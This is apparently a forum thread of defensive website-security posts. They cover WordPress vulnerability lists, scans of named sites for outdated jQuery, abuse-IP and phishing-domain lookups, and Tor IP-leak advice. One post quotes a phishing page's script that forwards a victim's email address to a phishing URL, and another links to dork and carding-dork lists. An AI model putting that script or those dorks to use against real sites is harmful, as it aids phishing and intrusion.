WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
5
WPVDB-ID:8721
WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
5
WPVDB-ID:8912
WordPress 4.4-4.8.1 - Path Traversal in Customizer
5
WPVDB-ID:8816
WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
5
WPVDB-ID:8817
WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
5
WPVDB-ID:8719
WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
5
WPVDB-ID:9174
WordPress <= 5.0 - User Activation Screen Search Engine Indexing
5
WPVDB-ID:8910
WordPress 2.9.2-4.8.1 - Open Redirect
4.9
WPVDB-ID:9006
WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
4.3
WPVDB-ID:9975
WordPress <= 5.3 - Stored XSS via Crafted Links
4.3
WPVDB-ID:8820
WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
4.3
WPVDB-ID:8819
WordPress 3.3-4.7.4 - Large File Upload Error XSS
4.3
WPVDB-ID:9910
WordPress <= 5.2.3 - Stored XSS in Style Tags
4.3
WPVDB-ID:8716
WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
4.3
WPVDB-ID:9867
WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
4.3
WPVDB-ID:8913
WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
4.3
WPVDB-ID:8718
WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
4.3
WPVDB-ID:9173
WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
4.3
WPVDB-ID:9055
WordPress 3.7-4.9.4 - Escape Version in Generator Tag
4.3
WPVDB-ID:8769
WordPress 4.7-4.7.2 - Cross-Site Scripting (XSS) via Taxonomy Term Names
4.3
WPVDB-ID:8731
WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table
4.3
WPVDB-ID:8914
WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
4.3
WPVDB-ID:8770
WordPress 4.2-4.7.2 - Press This CSRF DoS
4.3
WPVDB-ID:9170
WordPress <= 5.0 - Authenticated Post Type Bypass
4
WPVDB-ID:8967
WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
3.5
WPVDB-ID:9908
WordPress <= 5.2.3 - Stored XSS in Customizer
3.5
WPVDB-ID:9175
WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
3.5
WPVDB-ID:9976
WordPress <= 5.3 - Stored XSS via Block Editor Content
3.5
WPVDB-ID:8968
WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
3.5
WPVDB-ID:8768
WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
3.5
WPVDB-ID:8966
WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
3.5
WPVDB-ID:9172
WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
3.5
WPVDB-ID:8765
WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
3.5
WPVDB-ID:8714
WordPress 4.3-4.7 - Remote Code Execution (RCE) in PHPMailer
0
WPVDB-ID:8906
WordPress 2.3.0-4.7.4 - Authenticated SQL injection
0
2017 Vulners.comvulners.com

Reputation Check
PASSED
Google Safe Browse:OK
Spamhaus Check:OK
Abuse CC:OK
Dshield Blocklist:OK
Cisco Talos Blacklist: OK

Externally Linked Host   Hosting Provider   Country   
    -www.ahmand.ir          
    -koliee.ir   Hetzner Online GmbH   Germany    
    -www.jnin.ir   Hetzner Online GmbH   Germany    
    -www.kartam.ir          
    -www.kifam.ir          
    -www.ahmand-group.ir          
    -www.zamenn.ir   Hetzner Online GmbH   Germany    
    -www.imbti.ir   Hetzner Online GmbH   Germany    
    -www.vamam.ir   Hetzner Online GmbH   Germany    
    -www.gancher.ir      

polonus (volunteer 3rd party cold recon werbsite security-analyst and website error-hunter)    
Title: Re: Tests and other Media topics
Post by: polonus on May 02, 2020, 06:34:07 PM
Repositories: http://www.cybercrime-tracker.net/
https://atm.cybercrime-tracker.net/index.php?x=yara
https://darkode.cybercrime-tracker.net/
Many more to be mentioned in here: https://github.com/TheHive-Project/CortexDocs/blob/master/analyzer_requirements.md
and various others mentioned there, like https://hunter.io/domain-search

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 03, 2020, 05:17:08 PM
Now some info on combining resources to look at a specific redirect to detect a jQuery library vulnerability,
in this case on an Amazon Trust service propelled website with an event listener script flaw in leanModal.js.

Where did we stumble upon this particular redirect?
Well, here: https://urlscan.io/result/3bf58654-6a1e-4d83-9b11-aec6bbcf9d52/

Then we visited this: https://www.shodan.io/host/13.224.197.67

At Amazon Trust Services we met retiarable jQuery libraries:
Quote
Retire.js
jquery   2.1.4.min   Found in -https://www.amazontrust.com/jquery-2.1.4.min.js<br>Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Low   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   123
Medium   Regex in its jQuery.htmlPrefilter sometimes may introduce XSS

Saw inline script: -https://www.amazontrust.com/jquery-2.1.4.min.js

Event listener issue documentation for
https://askcodez.com/leanmodal-js-la-plus-simple-jquery-modal-script-depannage.html

(* code line 583 etc.) in sjcl-0.8.js
Code: [Select]
("a[rel*=leanModal]").leanModal({
    closeButton: ".modal_close"
});
  to have again completed this going around  ;) ;D

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 07, 2020, 10:03:02 PM
Checking on Content Security Policy, checked with CSP evaluator:
checked at -https://www.stetson.edu/software/greenpages/index.php
obj-src -> https: URI in object-src allows the execution of unsafe scripts.
Can you restrict object-src to 'none' only?
Script-src -> error'unsafe-inline'
'unsafe-inline' allows the execution of unsafe in-page scripts and event handlers.
help_outline'unsafe-eval'
'unsafe-eval' allows the execution of code injected into DOM APIs such as eval().
errorhttps:
https: URI in script-src allows the execution of unsafe scripts.

Quick Source
Quote
HTML
-www.stetson.edu/software/greenpages/index.php
7,820 bytes, 96 nodes

Javascript 6   (external 4, inline 2)
-www.googletagmanager.com/​gtm.js?id=GTM-MTV2B2
INLINE: (function() { let alreadyInsertedMetaTag = false function __insertDappDete
1,238 bytes

INLINE: (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date
370 bytes

-ajax.googleapis.com/ajax/libs/jquery/3.4.0/​jquery.min.js
-ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/​jquery-ui.min.js
-www.stetson.edu/software/greenpages/assets/js/​template.js

CSS 4   (external 2, inline 2)
-ajax.googleapis.com/ajax/libs/jqueryui/1.12.1/themes/smoothness/​jquery-ui.css
INJECTED

-www.stetson.edu/software/greenpages/assets/css/​style.css
INJECTED

INLINE: @media print {#ghostery-purple-box {display:none !important}}
61 bytes INJECTED

INLINE: :root #content > #center > .dose > .dosesingle, :root #content > #right > .dose
120 bytes INJECTED

On the other hand where websites seem rather secure like: -https://www.collegebeaufeuillagesaintbrieuc.ac-rennes.fr/
the hosting party for that particular IP it is on can be with many vulnerabilities: https://www.shodan.io/host/195.221.67.111

So we need two to tango securely, website on client and where it is being hosted on a webserver.
 
polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 08, 2020, 01:19:49 AM
Another comparison of scan results of this Hall of Shame website (F-Grade results):
https://www.immuniweb.com/websec/?id=K0O4GbwC
&
https://sitecheck.sucuri.net/results/usosweb.usos.pw.edu.pl
&
https://www.shodan.io/host/194.29.138.69

Retirable jQuery libraries: Retire.js
jquery-migrate   1.1.0.min   Found in -https://usosweb.usos.pw.edu.pl/js/jquery-migrate-1.1.0.min.js<br>Vulnerability info:
Medium   jQuery Migrate 1.2.0 Released cross-site-scripting   
Medium   11290 Selector interpreted as HTML   
jquery-ui-dialog   1.10.1   Found in -https://usosweb.usos.pw.edu.pl/js/jquery-ui-1.10.1.custom.min.js<br>Vulnerability info:
High   CVE-2016-7103 281 XSS Vulnerability on closeText option   
jquery   1.9.1.min   Found in -https://usosweb.usos.pw.edu.pl/js/jquery-1.9.1.min.js<br>Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-925
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Low   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   
Medium   Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   
jquery   1.9.1   Found in -https://usosweb.usos.pw.edu.pl/js/jquery-usos/latest-bundle.min.js?v=4<br>Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Low   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   123
Medium   Regex in its jQuery.htmlPrefilter sometimes may introduce XSS

See: https://observatory.mozilla.org/analyze/usosweb.usos.pw.edu.pl

SSL Server test: A grade: https://www.ssllabs.com/ssltest/analyze.html?&hideResults=on&d=usosweb.usos.pw.edu.pl

For kontroller.php -> https://github.com/ademkarakus/MYTicketSys/blob/master/kontroller.php
Security Overview: https://github.com/ademkarakus/MYTicketSys/security

polonus



Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2020, 11:22:53 PM
Abuse IP related resources:
https://www.abuseipdb.com/check/79.137.2.105
&
https://www.shodan.io/host/79.137.2.105
&
https://viz.greynoise.io/ip/79.137.2.105
&
https://bl.isx.fr/79.137.2.105
&
https://www.virustotal.com/gui/url/51ba250152a02b5b34937b6debfa340985958021b78566c396de7234a0ba9f0b/detection  (Spamhaus to detect)
4 engines to detect: https://www.virustotal.com/gui/ip-address/79.137.2.105/detection
(none) https://www.virustotal.com/gui/ip-address/79.137.2.105/relations
as well as here: https://secure.dshield.org/ipinfo.html?ip=71.137.2.105&update=yes

Flagged as attack source: https://db-ip.com/79.137.2.105
Not secure -> hxtps://ip105.ip-79-137-2.eu/

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 11, 2020, 12:34:48 PM
Check your device against the Thunderbolt-hole with Thunderspy
Thunderbolt can grant attackers fysical access onto locked computers

Read (with downloads) -> https://thunderspy.io/#TODO-FIX-ME

credits due go to Björn Ruytenberg

polonus

Title: Re: Tests and other Media topics
Post by: polonus on May 14, 2020, 07:07:07 PM
Various checks on a potentially malicious IP:

https://urlscan.io/ip/108.170.29.140

https://www.abuseipdb.com/check/108.170.29.140

https://cyberwarzone.com/malicious-history-of-108-170-29-140/

https://securitytrails.com/list/ip/108.170.29.140

https://www.virustotal.com/gui/ip-address/108.170.29.140/relations

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 15, 2020, 12:14:36 PM
Now apply this onto some IP addresses found in this report:
https://www.wordfence.com/blog/2020/05/one-attacker-rules-them-all/

As with most attack campaigns, the attacker frequently rotates IP addresses. At the moment, we are seeing attacks from these top 10 attacking IP addresses.

5.187.34.95 -> https://www.shodan.io/host/5.187.34.95
91.121.106.106 -> https://www.shodan.io/host/91.121.106.106  (see all the vulners there)
94.23.3.130 -> https://www.shodan.io/host/94.23.3.130 (see all the vulners there)
54.36.197.5 -> https://www.shodan.io/host/54.36.197.5 (see all the vulners there)
46.37.172.252 -> https://www.shodan.io/host/46.37.172.252 (with a great many vulnerabilities)
104.238.222.178 -> https://www.abuseipdb.com/check/104.238.140.243
2001:41d0:2:482:: -> https://www.abuseipdb.com/check/2001:41d0:2:482::
104.236.133.77 -> https://www.abuseipdb.com/check/104.236.133.77
2001:41d0:c:c3d:: -> https://www.abuseipdb.com/check/151.80.25.182
151.80.25.182

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 15, 2020, 02:50:25 PM
But there is more - domainnames found as connected with malcode:
https://www.virustotal.com/gui/url/629ada9a00e95b0408597f3fcfaf3c7d59355642372aee6e21bc1fa085bfa8e8/details
and IP relations (with 5 detections): https://www.virustotal.com/gui/ip-address/162.241.65.79/relations
net.net powered by vesta Coming Soon (must mean malware coming soon  ;) ).
Quote
<title>net.net — Coming Soon</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="description" content="This is a default index page for a new domain.">
    <style type="text/css">
See: https://www.shodan.io/host/162.241.65.79  Unified Layer abuse (various vulnerabilities listed).
Quote
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp  open  http    nginx
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: nginx
|_http-title: net.net &mdash; Coming Soon
443/tcp open  ssl
|_http-server-header: nginx
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|_  http/1.1

IP found in this list: https://gist.github.com/techhelplist/a24726050000a0432032d3cb840feb16
meaning
Quote
188winerium.com   #phishing GBA 162.241.65.79, 2020-03-27
dahlgrenhouse.com   #phishing GBA 162.241.65.79, 2020-03-27
debramarchese.com   #phishing GBA 162.241.65.79, 2020-03-27
giovannirosania.com   #phishing GBA 162.241.65.79, 2020-03-27
h2hcareplus.com   #phishing GBA 162.241.65.79, 2020-03-27
hmefrontoffice.org   #phishing GBA 162.241.65.79, 2020-03-27
northportdentures.com   #phishing GBA 162.241.65.79, 2020-03-27
northportsmiles.com   #phishing GBA 162.241.65.79, 2020-03-27
odontobaranda.com   #phishing GBA 162.241.65.79, 2020-03-27
portcharlottebottox.com   #phishing GBA 162.241.65.79, 2020-03-27
southwestgeorgiaurology.com   #phishing GBA 162.241.65.79, 2020-03-27
swguro.com   #phishing GBA 162.241.65.79, 2020-03-27
wilkumhome.com   #phishing GBA 162.241.65.79, 2020-03-27
wilmerdental.com   #phishing GBA 162.241.65.79, 2020-03-27
wilmerfranco.com   #phishing GBA 162.241.65.79, 2020-03-27
info credits go to Jay THL.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 18, 2020, 01:56:49 PM
Normally when we are going to this address - MediaWiki code is not shown.
Whenever we scan for DOM XSS sinks and sources we stumble at:
Results from scanning URL: https://84.96.107.210/
Number of sources found: 6
Number of sinks found: 1
See attached code as txt
At shodan.io we see: https://www.shodan.io/host/84.96.107.210  plus various vulnerabilities mentioned.

But we can via 210.107.96.84.rev.sfr.net
and then we will land at Wiki PEPS: http://84.96.107.210/mediawiki/index.php/Accueil

and then we stumble upon retirable code like
Code: [Select]
mustache.js 0.8.2 Found in
-http://84.96.107.210/mediawiki/load.php?debug=false&lang=fr&modules=ext.collapsiblevector.collapsibleNav%7Cext.embedVideo%2Cpopups%7Cext.flaggedRevs.advanced%7Cext.popups.images%7Cjquery.accessKeyLabel%2CbyteLength%2CcheckboxShiftClick%2Cclient%2Ccookie%2CgetAttrs%2Chidpi%2ChighlightText%2Cmw-jump%2Csuggestions%2CtabIndex%2Cthrottle-debounce%7Cmediawiki.RegExp%2CTitle%2CUri%2Capi%2Ccldr%2Cexperiments%2CjqueryMsg%2Clanguage%2Cnotify%2CsearchSuggest%2Cstorage%2Ctemplate%2Cuser%2Cutil%7Cmediawiki.api.user%7Cmediawiki.language.data%2Cinit%7Cmediawiki.libs.pluralruleparser%7Cmediawiki.page.ready%2Cstartup%7Cmediawiki.template.mustache%2Cregexp%7Cmediawiki.ui.button%2Cicon%7Cmmv.bootstrap%2Chead%7Cmmv.bootstrap.autostart%7Coojs%2Csite%7Cskins.vector.js%7Cuser.defaults&skin=vector&version=1sm2d3j<br>Vulnerability info:
Medium pull request 530 weakness in HTML escaping
Number of XSS-DOM-sources found: 98
Number of XSS-DOM-sinks found: 59

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 28, 2020, 06:50:32 PM
What sites pay Adblock to be whitelisted?
Example here: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=bXVsbHt9bXsjW3wuXX1n~enc
Re on IP: https://www.shodan.io/host/209.99.64.71

Interesting survey: https://jacobsalmela.com/2015/03/16/find-out-what-sites-paid-to-be-whitelisted-from-adblock-plus/

Or the way polonus did it: https://www.shodan.io/search?query=X-Adblock-Key%3A
and an example of a result found that way: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=MTk5LjU5LjI0Mi4xNTBg~enc

Consider: https://sitereport.netcraft.com/?url=http://199.59.242.150
Two engines to detect: https://www.virustotal.com/gui/ip-address/199.59.242.150/detection
IP relations: https://www.virustotal.com/gui/ip-address/199.59.242.150/relations

QED,

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 06, 2020, 12:30:13 PM
Check a website for reputation: https://talosintelligence.com/reputation_center/lookup?search=www.leader-price.pl
See: https://urlscan.io/result/c617e91f-000f-4e94-8081-fd470da4d52d/
And here: https://www.islegitsite.com/ Potentially legit.
Listed here: http://multirbl.valli.org/lookup/www.leader-price.pl.html
Quote
801   www.leader-price dot pl   fmb.la sa   sa.fmb.la   Not listed
7   -www.leader-price.pl   Hostkarma   -hostkarma.junkemailfilter.com   Listed
    Query:   
-www.leader-price.pl.hostkarma.junkemailfilter.com
    A Record:   
127.0.2.3
    TTL:   
43200
    DB_rc:   
Familiar domain (older than 10 days)
On AS: https://urlscan.io/asn/AS16276

Combine with the results of a scan here: https://webcookies.org

Also compare: https://badpackets.net/botnet-c2-detections/  and results here: https://ipinfo.io/AS208666
-> -https://t.co/ZusFyn1YfH abuse from IP:  https://www.abuseipdb.com/check/37.49.226.220
and https://blackip.ustc.edu.cn/sshrawlist.php?ip=37.49.226.220 (info courtesy of China Education and Research Network Center, credits go there);

Re: https://www.iptolocation.net/trace-51.68.189.111  and at blackip, we see: zookeeper, www, weblogic, webadmin, user, uploader, ubuntu, test, svn, support, student, spark, postgres, oracle, odoo, marketing, jenkins, gituser, git, ftpadmin, ec2-user, demo, debian, db2inst1, centos, ansible, admin. See: https://sitereport.netcraft.com/?url=vps-f6793ddb.vps.ovh.net
See: https://sitereport.netcraft.com/?url=vps-f6793ddb.vps.ovh.net

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 08, 2020, 11:25:35 AM
Is a website safe to visit? This one, -amco.xyz, is certainly not.

Checked at trustscam's: -damco.xyz here: https://trustscam.nl/damco.xyz
Redirecting -> https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=I3xtXl0ueHl6~enc
Consider second redirect: https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=Z3ZrfHoufCN1bHR0I3x0e3MuXl1tYF5gI3w1NyNeNTU1ezUwNTcyIzxzMT0xODk2NCZzMj03MzQwNCZqNj0x~enc
And  a third one : https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3LjE4cGx1c3N0fXt8bS5ue3RgXmA0Xjh8NjY5YjgzezZeMiMzPCZebFtea19bIz1bXnV9aDV7I3swezQyNSMxZjg4NzUyMTI3MTYmczE9MTg5NjQmczI9NzM0MDQmczM9Ynxea3Vze30mczU9JmxwPU1KJmoxPSZqMj0majM9Jmo0PSZqNT0majY9MQ%3D%3D~enc

Location: -https://gvkaz.adulttdates.com/c/da57dcXXXXX0572d?s1=18XXX&s2=7XXX4&j6=1
Note: This line has redirected the request to -https://gvkaz.adulttdates.com/c/da57dXXXXX50572d?s1=1XXX4&s2=7XX04&j6=1
Even server address -ip-184-168-131-241.ip.secureserver.net at GoDaddy's is re-directing via an URL Shortener:
-https://shortener.secureserver.net/error_404 -> TypeError: Cannot read property 'set' of undefined
 /error_404:163   ERROR: The request could not be satisfied CloudFront reply..

ReferenceError: ReactDOM is not defined
 /error_404:203

Quote
<html>
<head>
<noscript>
<meta http-equiv="refresh" content="0; url=/?group_id=3560&keyword=1XX64&subid=xgsxl5ede01eddaXXXXX992268&hasJs=false&jsChecked=true" />
</noscript>
<script type="text/javascript">
window.location.href = '/?group_id=3XX0&keyword=18964&subid=xgsxl5ede01eddXXXXXXXXXX268&jsChecked=true';
</script>
</head>
<body></body>
</html>
DOM-XSS source & sink

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on June 13, 2020, 12:31:57 PM
Zero-day exploit
Read: https://www.vice.com/en_us/article/v7gd9b/facebook-helped-fbi-hack-child-predator-buster-
hernandez


Unpatched IP discovery, this is an "oldy but goldy" in the realm of tor-exploits  (info credits go to Dominik Bok)

Re: http://xordern.net/ip-leakage-of-mobile-tor-browsers.html

Especially be careful using Brave browser's private window with tor. (update and fully patch tor browser always)
Disable Autoplay, all kind of external multi-media elements can be loaded through internal multimedia players.
In this way the internal user IP-address can be discovered easily, even after 1 or 2 request for the running "raw http stream" content.

Check using Quick Source View extension in the browser to find out what normally is being loaded externally.
To use tor a tad more safely in a legit fashion this is very important.

This also could happen when no WebChromeClient for inline HTML5 Video on android had is being set.

Perfect all-round security will always be and stay an illusion,
and in the aforementioned case the facebook zero-day exploit helped to nail the child-abuser.
So as often repeated the credo is: "Don't do the crime, if you can't pay the time!".

But on the other hand it could also mean danger for legit users and journalist working amidst dictatorships
and for them such a facebook zero day would just mean bad luck and could potentially endanger their lives.

"When the going gets narrow , always keep your eye on the Tor-sparrow".
So it often is a cat-and-mouse game. And in the aforementioned case the authorities did win.
 (info credits go to xordern and luntrus)

Quote
<video controls="controls" autoplay="autoplay" poster="<=php file>">
                  
<source src="<=php file>" type="video/mp4" />
                  
</video>
]

Check for eventual IP leakage with HTML5 herehttp://xordern.net/checkip
For me Fire Onion on android seems secure.

Enjoy, my good friends, enjoy,

polonus

P.S. Also be aware not to land at a blacklisted exit node, example: https://cleantalk.org/blacklists/185.220.101.143
which there is being blacklisted by three instances.

D.
Title: Re: Tests and other Media topics
Post by: polonus on June 14, 2020, 05:17:27 PM
Interactions of Programming Languages being made visible:

https://exploring-data.com/vis/programming-languages-influence-network/#JavaScript

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 15, 2020, 09:17:49 PM
Weak PHP - PHP insecurity on websites (webserver).
While testing a particular website with Nibbler, I stumbled upon these:
-http://dorinfo.ru/
-http://dorinfo.ru/fines.php
-http://dowinfo.ru/PDD/php
-http://dorinfo.ru/contacts.php
-http://dorindo.ru/register.php

But there is more as we can establish from this public scan: code lines 123 - 128 ->
https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=I119W25mXS59dQ%3D%3D~enc

E.g: /news/addnews.php  -> XSS-DOM
Number of sources found: 4
Number of sinks found: 499

None: Results from scanning URL:
htXp://dorinfo.ru/bitrix/cache/js/s1/detailed/template_53dfdefb96a04a200ee821253e355c32/template_53dfdefb96a04a200ee821253e355c32_v1.js?1583321714934
Number of sources found: 0
Number of sinks found: 0

Results from scanning URL: -http://dorinfo.ru/bitrix/templates/test/js/custom.js
Number of sources found: 1
Number of sinks found: 0

And code from Results from scanning URL: -https://zeus-net.info/
Number of sources found: 7
Number of sinks found: 0
/*! nanoScrollerJS v0.7.2 (c) 2013 James Florentino; Licensed MIT */

Site being built with Citrix- JQuery etc. Scripts not vulnerable.

But Unique IDs about your web browsing habits have been insecurely sent to third parties.

2zdz5jXXXXXXXXXXvrku14zqvh9s2rkm -dorinfo.ruphpsessid  HTTP page.

On host: https://www.shodan.io/host/92.53.106.47

Site could bewhitelisted despite the lack of best security policies.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 16, 2020, 09:56:50 AM
Website Origin Exposure Test: https://bitmitigate.com/origin-exposure-test.html

Stumbled upon this here: https://urlscan.io/result/44be362b-3303-45df-b26d-9ce187635717/
No origins exposed! Unless 45.88.202.115 is your origin

If your origin servers are exposed attackers can attack them directly and bypass any sort of protection you may have.
Many large CDN companies have bad design which allows for serious security vulnerabilities.

Where we tested for -com-find.info ( https://urlscan.io/result/eb5d63e7-3099-4a96-ac37-9d19113de972/ 0,
Bitdefender flags PHISHING -> Amazon-abuse -> https://www.virustotal.com/gui/url/ae8afb6f83c66624ec40e0565177076a8b5950d064fee17e32f5409c729abcbd/detection

Also we have met with a "412 Precondition Failed" see: https://www.shodan.io/host/54.72.9.51
Read: https://www.eukhost.com/kb/412-precondition-failed-error-solved/

polonus (volunteer 3rd party cold recon website security analyst and website eror-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 18, 2020, 11:55:06 AM
Did you read this? https://www.reuters.com/article/us-alphabet-google-chrome-exclusive/exclusive-massive-spying-on-users-of-googles-chrome-shows-new-security-weakness-idUSKBN23P0JO
on chrome extension security? Already gone from the Webshop: https://awakesecurity.com/wp-content/uploads/2020/06/GalComm-Malicious-Chrome-Extensions-Appendix-B.txt

How to check before you install or already installed extensions?

Use CRXcavator (yep, rhymes with excavator): https://crxcavator.io/

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 25, 2020, 03:11:48 PM
In website scanning you loose some online scanners and you gain some.

We lost scanners like urlquery dot net, old scan results can sometimes still be found in online archives.
We also lost clean mx as a publicly accessible resource, because of abuse and attacks by cybercriminals.

Sometimes you stumble onto promising new ones, like  https://webbkoll.dataskydd.net/en/results?url=

Use such online website scan resources  in combination with others like:
https://domainwat.ch/site/ & https://censys.io/ & https://www.nlnetlabs.nl/
& https://htbridge.com & https://luxsci.com/smtp-tls-checker
together with a whole row of others.

Enjoy, my good friends, enjoy,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 27, 2020, 06:55:11 PM
What to look for in a URL to catch a PHISH before it catches you!

Nice read-up on that subject: https://towardsdatascience.com/phishing-domain-detection-with-ml-5be9c99293e5
Info credits go to: Ebubekir Büber.

A PHISHING site is not to say all of the site is PHISHING. It could be one page, on a sub-domain or via a hacked website.

Look here: https://www.phishtank.com/phish_detail.php?phish_id=6651347 
or here: https://checkphish.ai/
and combine with a scan here: https://www.zonemaster.net/domain_check   

Also look for top level domain switches where an ending in com is the real McCoy and ending in dot org means a PHISH.
Look for obfuscated code and minnified JavaScript (or PHISHING on an account that has been suspended).

Also check here: http://ssl-checker.online-domain-tools.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 03, 2020, 04:56:02 PM
Find the dork before the dork may find you.

Weak php and weak cgi exist, and it can be abused by attackers.

See a list like this one: https://gist.github.com/m0k1/ada77aacefe3dcae7bc2
or this one: https://itechhacks.com/latest-fresh-carding-dorks-2016/

Dorks can reveal where such weaknesses exist via a query in a specific searchengine, like for instance shodan.io.

It is the task of security a dork does not lead to an attack: https://cxsecurity.com/dorks/12

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 07, 2020, 12:05:09 AM
Checking on certificates, example: https://crt.sh/?q=avast.com

And in particular one of those: https://crt.sh/?id=49504394

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 10, 2020, 01:25:02 PM
Mozilla now shortens lifespan of TLS certificates also to enhance https security.
A better way to do this is to use DANE for web:
Read: https://cs.gmu.edu/~eoster/doc/2015-08-US-Telecom-DANE.pdf

Check with DANE SMPT Validator (random example): https://dane.sys4.de/smtp/security.nl
or through https://www.huque.com/bin/danecheck  or  https://check.sidnlabs.nl/dane/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 12, 2020, 06:11:59 PM
Privacy error on page. Nontrusted Certificate F-grade, see full report here:
https://www.ssllabs.com/ssltest/analyze.html?&hideResults=on&d=myavcs.com
opening up to  -https://www.disasterrecoverycenter.org  also NON TRUSTED and expired!
This website has a T-grade, which is even worse. Advanced iFrame functions there.

You can report similar UNTRUSTED websites through the suspicious site reporter extension in the browser.

Here we can read about exploitable PHP functions and how they have been troubling us for the last thirty years and more:
https://stackoverflow.com/questions/3115559/exploitable-php-functions
and another discussion here on appsec:
https://security.stackexchange.com/questions/1382/disable-insecure-dangerous-php-functions

pol

Title: Re: Tests and other Media topics
Post by: polonus on July 21, 2020, 03:25:01 PM
Testing for php on a particular PHISHING page where we know it has Endurance Page Cache php translation to html as scan for Endurance Page Cache html may help to reveal it in the code (regular expression mail-code etc.),
example checking on -https://cndherbals.com/endurance-page-cache.html
Quote
  type="text/javascript" >
function validateEmail(email) {
var re = /^(([^<>()[\]\.,;:\s@\"]+(\.[^<>()[\]\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
return re.test(email);
}
var hash = window.location.hash.substring(1);
if(validateEmail(hash)) {
window.location = "-https://www.yuxuans.cn/wp-admin/network/dooo/quota/?email="+hash;
}
also uses MonsterInsights on Google Analytics,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 22, 2020, 01:12:03 PM
Domain names and subdomain enumeration...Used are dns en WHOIS protocol methods.
Re: https://dnsspy.io/scan
Also for sub-domains: https://securitytrails.com/blog/subdomain-scanner-find-subdomains.

Automatically generated at places where you could register.
Via zone-owner, authorities here are very restrictive because of risks.
Through DNS queries (example Cisco Umbrella (OpenDNS)
Via Certificate Transparency:  https://crt.sh/.
Through scans at shodan & censys etc.
Through multi-threaded scripts, Clone DNS-root-directories to see what is still available (free).
